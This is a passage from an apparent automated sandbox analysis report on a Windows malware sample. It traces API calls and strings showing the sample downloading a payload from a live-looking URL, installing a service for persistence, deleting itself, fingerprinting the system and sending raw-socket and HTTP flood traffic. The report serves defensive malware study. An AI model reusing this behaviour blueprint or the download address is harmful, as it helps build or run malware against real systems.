      • GetProcAddress.KERNEL32(6F3E0000,InternetCloseHandle), ref: 0040664F
      • Sleep.KERNELBASE(001B7740), ref: 00406660
      • InternetOpenA.WININET(MyAgrent,00000000,00000000,00000000,00000000), ref: 00406674
      • InternetOpenUrlA.WININET(http://www.003zzy.com/ad1in.htm,00000000,00000000,80000000,00000000), ref: 0040669D
      • InternetReadFile.WININET(00406949,000000FF,00406544), ref: 004066C5
      • InternetCloseHandle.WININET ref: 004066D1
      • InternetCloseHandle.WININET ref: 004066DD
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressInternetProc$CloseHandleLibraryLoadOpen$FileReadSleep
      • String ID: C:\WINDOWS\admier.exe$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MyAgrent$URLDownloadToFileA$http$http://www.003zzy.com/ad1in.htm$open$urlmon.dll$wininet.dll
      • API String ID: 4214780637-2500366654
      • Opcode ID: b48563ea9cb6f9baff5769bfe651dd4d1cbef5429e188547ae9e13d74fe99cf0
      • Instruction ID: 65db73e173750bc762846c45c3d24e508618b8540af41c8d1503c79e64b7ea12
      • Opcode Fuzzy Hash: b48563ea9cb6f9baff5769bfe651dd4d1cbef5429e188547ae9e13d74fe99cf0
      • Instruction Fuzzy Hash: 30513CB0685340BFD3119FA4BE1AB563FA5B706B15F22007AF503BA5EAD3B954348B0D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 83 40d07e-40d097 DeleteFileA 84 40d099-40d0af GetPEB 83->84 85 40d03f-40d056 GetProcAddress 83->85 87 40d0b1-40d0b8 84->87 88 40d0bc-40d0bd call 40d0c2 84->88 86 40d034-40d038 85->86 90 40d058-40d05e 86->90 91 40d03a-40d03d 86->91 92 40d060 90->92 93 40d01f-40d031 LoadLibraryA 90->93 91->85 92->83 93->86
      APIs
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      • DeleteFileA.KERNELBASE(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction ID: febd643f651e9d90d4cf83c175e36f54a99a928136d9d2cdfec75408947fadb0
      • Opcode Fuzzy Hash: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction Fuzzy Hash: DE01B1B1C001149FD3259F94DD44B267769EB03328F25507AE80EBB682D7B9AC0ADA1D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 94 40d06a-40d097 DeleteFileA 95 40d099-40d0af GetPEB 94->95 96 40d03f-40d056 GetProcAddress 94->96 98 40d0b1-40d0b8 95->98 99 40d0bc-40d0bd call 40d0c2 95->99 97 40d034-40d038 96->97 101 40d058-40d05e 97->101 102 40d03a-40d03d 97->102 103 40d060-40d097 DeleteFileA 101->103 104 40d01f-40d031 LoadLibraryA 101->104 102->96 103->95 103->96 104->97
      APIs
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      • DeleteFileA.KERNELBASE(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction ID: 92145c9a365872201136f2ad8642b24408a080cd8a60a41ca3e7793543610a8a
      • Opcode Fuzzy Hash: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction Fuzzy Hash: A0E0EC309852408FC326DBB48959916BB71EB03315F1564B6D009F76A2C378DC4EC61D

      Control-flow Graph

      APIs
      • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,76835280), ref: 004011FA
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76835280), ref: 00401214
      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00401231
      • Sleep.KERNELBASE(00000001,00000000,?,76835280), ref: 00401242
      • lstrcat.KERNEL32(?,?), ref: 00401284
      • lstrcat.KERNEL32(?,?), ref: 004012C7
      • GetCurrentProcess.KERNEL32 ref: 00401302
      • SetPriorityClass.KERNELBASE(00000000), ref: 0040130F
      • GetCurrentThread.KERNEL32 ref: 00401313
      • SetThreadPriority.KERNELBASE(00000000), ref: 00401320
      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,00000100), ref: 00401342
      • SetPriorityClass.KERNELBASE(?,00000040), ref: 00401354
      • SetThreadPriority.KERNELBASE(00000100,000000F1), ref: 0040135D
      • ResumeThread.KERNELBASE(00000100), ref: 00401364
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: PriorityThread$ClassCurrentNameProcesslstrcat$CreateEnvironmentFileModulePathResumeShortSleepVariable
      • String ID: /C del $ > nul$COMSPEC$D
      • API String ID: 1484168510-811065519
      • Opcode ID: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction ID: 83a5a0624438e48de483ece212b65a11f95c74cb0b9da3eb9e72a1bcf4c41a49
      • Opcode Fuzzy Hash: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction Fuzzy Hash: B541A071644300AFE324CB75DC49FABB7E9BBC4710F008A2DB69AA72D0DBB599048B55

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 106 40d016-40d01c 107 40d01f-40d031 LoadLibraryA 106->107 108 40d034-40d038 107->108 109 40d058-40d05e 108->109 110 40d03a-40d03d 108->110 109->107 112 40d060-40d097 DeleteFileA 109->112 111 40d03f-40d056 GetProcAddress 110->111 111->108 112->111 114 40d099-40d0af GetPEB 112->114 115 40d0b1-40d0b8 114->115 116 40d0bc-40d0bd call 40d0c2 114->116
      APIs
      • LoadLibraryA.KERNELBASE(00400000,00400000), ref: 0040D028
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID:
      • API String ID: 2574300362-0
      • Opcode ID: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction ID: 6c3bf372d224c83a881a8ca97f7b757c9271284dc59a6cb52084675be33e3eb9
      • Opcode Fuzzy Hash: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction Fuzzy Hash: 42E065B18401289BD3245B40ED44762371CDB02328F194079EC097F682D77E6C07861C

      Non-executed Functions

      Control-flow Graph

      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004021AB
      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004021DA
      • GetLastError.KERNEL32 ref: 004021E9
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004021FD
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00402211
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0040221C
      • wsprintfA.USER32 ref: 00402233
      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0040224C
      • lstrlen.KERNEL32(?), ref: 00402256
      • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,?,00000000), ref: 0040226B
      Strings
      • Description, xrefs: 00402262
      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 00402227
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$Open$Start$CreateErrorLastManagerValuelstrlenwsprintf
      • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
      • API String ID: 1085164444-2908613140
      • Opcode ID: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction ID: f4580113edc8e433eb06b14144884acc633483daa5052ba9940653bc4dc6f673
      • Opcode Fuzzy Hash: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction Fuzzy Hash: 9C319971981224BBD720DF949E49F9F7B7CEB48B51F100169FA15B62C1C7B45910CBA8
      APIs
      • GetCurrentProcess.KERNEL32(00000028), ref: 004013A2
      • OpenProcessToken.ADVAPI32(00000000), ref: 004013A9
      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004013C3
      • CloseHandle.KERNEL32(00000000), ref: 004013D2
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue
      • String ID:
      • API String ID: 2654680240-0
      • Opcode ID: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction ID: cc2b99641f5a8469a3b4e8ed31b91ddc2a866a93870fc30e959dc988af51fc73
      • Opcode Fuzzy Hash: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction Fuzzy Hash: 61115EB4644301ABE700DF64CD49B6B77E8FF88700F80892CF989E6290E378D9048B67

      Control-flow Graph

      APIs
      • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 00403145
      • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040317A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Socketsetsockopt
      • String ID: %u.193.%d.%d$@$E$P
      • API String ID: 4073417641-4005098346
      • Opcode ID: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction ID: 4f5575538a0cf794be7eb95a31b6b2e6ffef1db0ee0ea924ed66e0d3a4dc536f
      • Opcode Fuzzy Hash: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction Fuzzy Hash: 7C81CE711083449AD710DF64DC41BABBBE5AFC8710F00492EF695A72D1DAB49A08CBAB

      Control-flow Graph

      APIs
      • GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 0040187B
      • GetProcAddress.KERNEL32(00000000), ref: 00401882
      • GlobalAlloc.KERNEL32(00000040,?), ref: 004018AC
      • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 004018E2
      • GetLastError.KERNEL32 ref: 004018F2
      • printf.MSVCRT ref: 004018FE
      • GlobalFree.KERNEL32(?), ref: 00401914
      • GetProcAddress.KERNEL32(00000000,KeServiceDescriptorTable), ref: 00401920
      • printf.MSVCRT ref: 0040192F
      • printf.MSVCRT ref: 00401A10
      Strings
      • Can't find KeServiceDescriptorTable, xrefs: 0040192A
      • strange NtQuerySystemInformation()!, xrefs: 00401A0B
      • Failed to load! LastError=%i, xrefs: 004018F9
      • ntdll.dll, xrefs: 00401870
      • Can't find KiServiceTable..., xrefs: 00401952
      • Possibly KiServiceLimit==%08X, xrefs: 004019EE
      • KeServiceDescriptorTable, xrefs: 0040191A
      • NtQuerySystemInformation, xrefs: 0040186B
      • &KiServiceTable==%08XDumping 'old' ServiceTable:, xrefs: 00401972
      • 0x%x 0x%08X, xrefs: 004019CB
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: printf$AddressGlobalProc$AllocErrorFreeHandleLastLibraryLoadModule
      • String ID: Possibly KiServiceLimit==%08X$&KiServiceTable==%08XDumping 'old' ServiceTable:$0x%x 0x%08X$Can't find KeServiceDescriptorTable$Can't find KiServiceTable...$Failed to load! LastError=%i$KeServiceDescriptorTable$NtQuerySystemInformation$ntdll.dll$strange NtQuerySystemInformation()!
      • API String ID: 3553604609-3775360644
      • Opcode ID: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction ID: 5768c73fbee113661ea424cb43e8d9f95342857d559040dcccde774f527aca14
      • Opcode Fuzzy Hash: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction Fuzzy Hash: 4E511371240305AFD700EF98DE85D6BB7A8FFC8710F00053EF946A6241E639E915CBAA

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 299 402cb0-402d0e RegOpenKeyExA 300 402d14-402d70 RegQueryValueExA RegCloseKey 299->300 301 402db6-402dd1 299->301 303 402d72 300->303 304 402d95-402db4 300->304 302 402dd3-402dfa GetVersionExA 301->302 305 402e09-402e11 302->305 306 402dfc-402e08 302->306 307 402d78-402d8e _strnicmp 303->307 304->302 308 402e13-402e14 305->308 309 402e7c-402e84 305->309 307->304 310 402d90-402d93 307->310 312 402ec7-402fc9 wsprintfA GlobalMemoryStatusEx call 4056b0 _ui64toa GetSystemDefaultUILanguage 308->312 313 402e1a-402e24 308->313 311 402e86-402e8f 309->311 309->312 310->304 310->307 314 402e91-402e9a 311->314 315 402e9c-402e9f 311->315 316 402e31-402e34 313->316 317 402e26-402e2f 313->317 319 402eaa-402ec5 314->319 315->312 320 402ea1-402ea5 315->320 321 402e36-402e40 316->321 322 402e6c-402e6f 316->322 317->319 319->312 320->319 325 402e42-402e4b 321->325 326 402e4d-402e50 321->326 322->312 324 402e71-402e7a 322->324 324->319 325->319 327 402e52-402e5b 326->327 328 402e5d-402e5f 326->328 327->319 328->312 329 402e61-402e6a 328->329 329->319
      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,00000000), ref: 00402D06
      • RegQueryValueExA.ADVAPI32 ref: 00402D48
      • RegCloseKey.ADVAPI32(?), ref: 00402D53
      • _strnicmp.MSVCRT ref: 00402D87
      • GetVersionExA.KERNEL32(?), ref: 00402DF2
      • wsprintfA.USER32 ref: 00402EE6
      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00402EFC
      • _ui64toa.MSVCRT ref: 00402F2A
      • GetSystemDefaultUILanguage.KERNEL32 ref: 00402FA0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValueVersion_strnicmp_ui64toawsprintf
      • String ID: %s SP%d$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$ProcessorNameString$Win 2000$Win 2003$Win 95$Win 98$Win NT$Win Vista$Win XP
      • API String ID: 3322224748-824182824
      • Opcode ID: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction ID: 13d3b61b23b45e2e4c023b9cc0fc35249b46de21b34556b10f0f5e52fe902c2b
      • Opcode Fuzzy Hash: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction Fuzzy Hash: 108127316047044BD728CA24C904BABB3D6FBC4320F514A3EF95AE73D0DFB99D09868A

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 330 404090-4040e0 strstr 331 4040e2-4040f1 330->331 332 4040f8-404105 strstr 330->332 331->332 333 404107-404168 strcspn strncpy strcspn 332->333 334 40416a-40417b 332->334 333->334 335 4041a1-40420b htons call 4030e0 334->335 336 40417d-40419f 334->336 339 404211-404212 335->339 340 40432d-404338 335->340 336->335 341 404218-40423d wsprintfA 339->341 342 40424b-404294 wsprintfA socket connect 341->342 343 40423f-404249 341->343 344 404311-404318 342->344 345 404296-4042ce setsockopt * 2 342->345 343->342 344->341 347 40431e-40432a 344->347 346 4042d3-4042fb send Sleep 345->346 346->346 348 4042fd-40430d closesocket Sleep 346->348 348->344
      APIs
      Strings
      • http://, xrefs: 004040B9, 004040E2
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 0040426A
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstrwsprintf$closesocketconnecthtonssendsocketstrncpy
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1549958995-1933603558
      • Opcode ID: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction ID: c1fde26447f8656147e6786571948f54528d1b62fa49e0ea339f3debddb0944f
      • Opcode Fuzzy Hash: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction Fuzzy Hash: EB7105722043005BD714DB28DD41AAB77E5FBC8320F014A3EFA56A72D1DEB5DA09CB99

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 349 403e20-403e70 strstr 350 403e72-403e81 349->350 351 403e88-403e95 strstr 349->351 350->351 352 403e97-403ef8 strcspn strncpy strcspn 351->352 353 403efa-403f0b 351->353 352->353 354 403f31-403fcd htons call 4030e0 wsprintfA 353->354 355 403f0d-403f2f 353->355 358 403fd3-403fd4 354->358 359 40407e-404089 354->359 355->354 360 403fda-403ff9 socket connect 358->360 361 404062-404069 360->361 362 403ffb-404023 setsockopt * 2 360->362 361->360 364 40406f-40407b 361->364 363 404028-404050 send Sleep 362->363 363->363 365 404052-404060 closesocket Sleep 363->365 365->361
      APIs
      • strstr.MSVCRT ref: 00403E69
      • strstr.MSVCRT ref: 00403E8E
      • strcspn.MSVCRT ref: 00403EB0
      • strncpy.MSVCRT ref: 00403EB9
      • strcspn.MSVCRT ref: 00403EC5
      • htons.WS2_32 ref: 00403F52
      • wsprintfA.USER32 ref: 00403FAD
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403FE0
      • connect.WS2_32(00000000,?,00000010), ref: 00403FF0
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0040400D
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,00000001,00000004), ref: 00404021
      • send.WS2_32(00000000,?,?,00000000), ref: 00404045
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040404D
      • closesocket.WS2_32(00000000), ref: 00404053
      • Sleep.KERNEL32(?,?,00000000), ref: 00404060
      Strings
      • http://, xrefs: 00403E49, 00403E72
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 00403FA7
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstr$closesocketconnecthtonssendsocketstrncpywsprintf
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1044657935-1933603558
      • Opcode ID: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction ID: 40c65565b0e2d1f7331450249f0e816538a445790bab8e04dbed30efe200627d
      • Opcode Fuzzy Hash: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction Fuzzy Hash: 9D61F1722002055AD724DB34DD01BAB77D5FBC8720F004A3EFA56A72D1DEB99A09CB99

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00401525
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040152E
